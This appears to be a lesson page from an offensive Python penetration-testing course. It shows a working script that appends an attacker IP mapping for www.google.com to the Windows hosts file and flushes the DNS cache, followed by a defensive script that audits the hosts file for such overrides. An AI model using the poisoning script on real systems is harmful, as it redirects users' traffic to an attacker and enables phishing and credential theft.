DNS poisoning
From course: Python For Offensive PenTest: A Complete Practical Course.
General index of the course
- Gaining persistence shells (TCP + HTTP)
- Advanced scriptable shells
- Techniques for bypassing filters
- Malware and cryptography
- Password hijacking
- Privilege escalation
1. Add a new line to the hosts file in Windows with the attacker IP and a URL.
2. Flush the DNS cache to make sure that the updated record is used.
Traffic for that URL will now be redirected to the attacker machine.
Python script for DNS poisoning
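```python
import subprocess
import os
# Raw string so the backslashes in the Windows path are not read as escape sequences
os.chdir(r"C:\Windows\System32\drivers\etc")

# Append a record to the hosts file that maps the URL to the attacker IP
command = "echo 10.10.10.100 www.google.com >> hosts"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
CMD.communicate()  # wait for the write to finish before flushing the cache

# Flush the DNS cache so that the updated record is used
command = "ipconfig /flushdns"
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
CMD.communicate()
```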
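On the defending side, the record this script appends is straightforward to detect by auditing the hosts file for static overrides. The following is an added example, not part of the course material; the sample file contents, the `localhost` allowlist and the function names are assumptions made for illustration.

```python
import ipaddress

# Constructed sample: typical default entries plus the record the script above appends.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#       127.0.0.1       localhost
127.0.0.1 localhost
::1 localhost
10.10.10.100 www.google.com
0.0.0.0 ads.example.test   # sinkhole entry
not-an-ip broken.example.test
"""

OVERRIDE = "static override bypasses DNS"

def audit_hosts(text, allowed=frozenset({"localhost"})):
    """Return (line_no, address, hostname, reason) for every entry worth reviewing."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].split()  # drop comments, split on whitespace
        if not entry:
            continue
        addr, names = entry[0], entry[1:]
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            findings.append((line_no, addr, " ".join(names), "malformed address"))
            continue
        for name in names:  # one line may map several hostnames
            name = name.lower().rstrip(".")
            if name in allowed:
                continue
            if ip.is_loopback or ip.is_unspecified:
                reason = "sinkhole/blocking entry"
            else:
                reason = OVERRIDE
            findings.append((line_no, str(ip), name, reason))
    return findings

def overrides(text):
    """Only the entries that point a hostname at another machine."""
    return [f for f in audit_hosts(text) if f[3] == OVERRIDE]

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

Run against the real file on a schedule, or on a file-modification event for the hosts file, and alert on any result from `overrides()`.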